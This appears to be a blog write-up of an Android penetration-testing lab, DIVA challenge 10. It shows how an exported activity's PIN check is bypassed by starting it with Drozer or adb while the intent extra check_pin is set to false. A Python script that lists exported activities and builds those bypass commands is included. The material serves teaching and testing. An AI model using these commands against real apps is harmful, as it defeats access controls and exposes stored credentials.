Saturday, December 31, 2016

ANDROID PT - DIVA / 10 - Access Control Issues 2 - Intent Filter Vulnerability (2)


- Layout for this exercise:

- Connecting from Santoku to Nexus 5 with ADB:

- Launching the application: 

- Clicking the tab for challenge 10:

- The application asks the user to register at a website in order to obtain a PIN, which is then required to log in and view the API credentials of a third-party application:

- Entering a wrong PIN, access is denied:

- The goal of this challenge is to read the third-party API credentials from outside the application, without supplying any PIN.

- Looking at AndroidManifest.xml, the activity for this challenge declares an intent filter with the action jakhar.aseem.diva.action.VIEW_CREDS2. An activity that declares an intent filter is exported by default unless it sets android:exported="false", so it can be started by other applications:

- We could try starting the activity with the Activity Manager (am start) by its action alone, but that does not get us the credentials: the activity simply prompts the user to register:

- However, Drozer is a lot more powerful here. Starting the Drozer agent's embedded server on the Nexus 5:

- Launching the Drozer console on Santoku Linux:

- Running Drozer's activity info module against the package, the exported activity APICreds2Activity is listed:

- Opening the Java source code of the activity APICreds2Activity:

- It is noticeable that a boolean extra taken from the incoming intent is compared to "true", and only when it is true is the user asked to register at a website.

- Opening the for this challenge:

- So, as mentioned, this boolean decides whether the PIN check is enforced at all.

- Looking at the application's string resources, a string with the value check_pin is defined; this is the name of the intent extra the activity reads:

- Now, from Drozer the activity's intent filter is invoked with the boolean extra check_pin set to "false" instead of its default "true", in order to bypass the access control:

- The result is successful: the API credentials are displayed without entering any PIN, valid or invalid:
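- The procedure above (find the exported activity in the manifest, then start it with the extra set to false) can be scripted. The following is an added example for this write-up, not code from DIVA or Drozer: the manifest excerpt is constructed (modeled on the activity discussed here; the package name jakhar.aseem.diva is assumed from the action prefix), and the script lists activities that any other app, adb or Drozer can start and builds the equivalent `am start` and Drozer `app.activity.start` commands carrying a boolean extra.

```python
"""Triage an AndroidManifest.xml for externally startable activities and
build the commands that start them with a chosen boolean intent extra.

Added example; not part of DIVA or Drozer. The manifest below is
constructed for this example; the package jakhar.aseem.diva is assumed.
"""
import shlex
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest excerpt (not the real DIVA manifest).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="jakhar.aseem.diva">
  <application android:label="Diva">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".APICreds2Activity">
      <intent-filter>
        <action android:name="jakhar.aseem.diva.action.VIEW_CREDS2"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity" android:exported="false">
      <intent-filter>
        <action android:name="jakhar.aseem.diva.action.INTERNAL"/>
      </intent-filter>
    </activity>
    <activity android:name=".PlainActivity"/>
  </application>
</manifest>
"""


def exported_activities(manifest_xml):
    """Return [(fully qualified activity name, [actions])] for activities
    that another app (or adb/Drozer) can start.

    Rule applied: exported if android:exported="true", or if the activity
    declares at least one <intent-filter> and does not set
    android:exported="false" (the implicit-export rule for the API levels
    DIVA targets; from API 31 the attribute has to be explicit).
    """
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    found = []
    for act in root.iter("activity"):
        name = act.get(ANDROID_NS + "name")
        if name.startswith("."):
            name = package + name  # expand the relative class name
        exported_attr = act.get(ANDROID_NS + "exported")
        filters = act.findall("intent-filter")
        actions = [a.get(ANDROID_NS + "name")
                   for f in filters for a in f.findall("action")]
        if exported_attr == "true" or (exported_attr is None and filters):
            found.append((name, actions))
    return found


def am_start_command(action, extras=None):
    """adb command that starts an implicit intent by action; `--ez KEY VALUE`
    is the Activity Manager syntax for a boolean extra."""
    parts = ["adb", "shell", "am", "start", "-a", action]
    for key, value in (extras or {}).items():
        parts += ["--ez", key, "true" if value else "false"]
    return " ".join(shlex.quote(p) for p in parts)


def drozer_start_command(action, extras=None):
    """Equivalent Drozer console command using the app.activity.start module."""
    parts = ["run", "app.activity.start", "--action", action]
    for key, value in (extras or {}).items():
        parts += ["--extra", "boolean", key, "true" if value else "false"]
    return " ".join(parts)


if __name__ == "__main__":
    for activity, actions in exported_activities(SAMPLE_MANIFEST):
        print(activity, actions)
        for action in actions:
            if action.startswith("android.intent.action."):
                continue  # launcher entry point, nothing to bypass there
            print("  ", am_start_command(action, {"check_pin": False}))
            print("  ", drozer_start_command(action, {"check_pin": False}))
```

Note that once the extra is supplied, the plain Activity Manager invocation works just as well as Drozer: the earlier `am start` attempt only failed because no extra was sent, so the activity fell back to its default of true. The underlying bug is that an access-control decision is taken from a value the caller controls; an extra on an incoming intent is attacker input, and the PIN check should not be switchable by it.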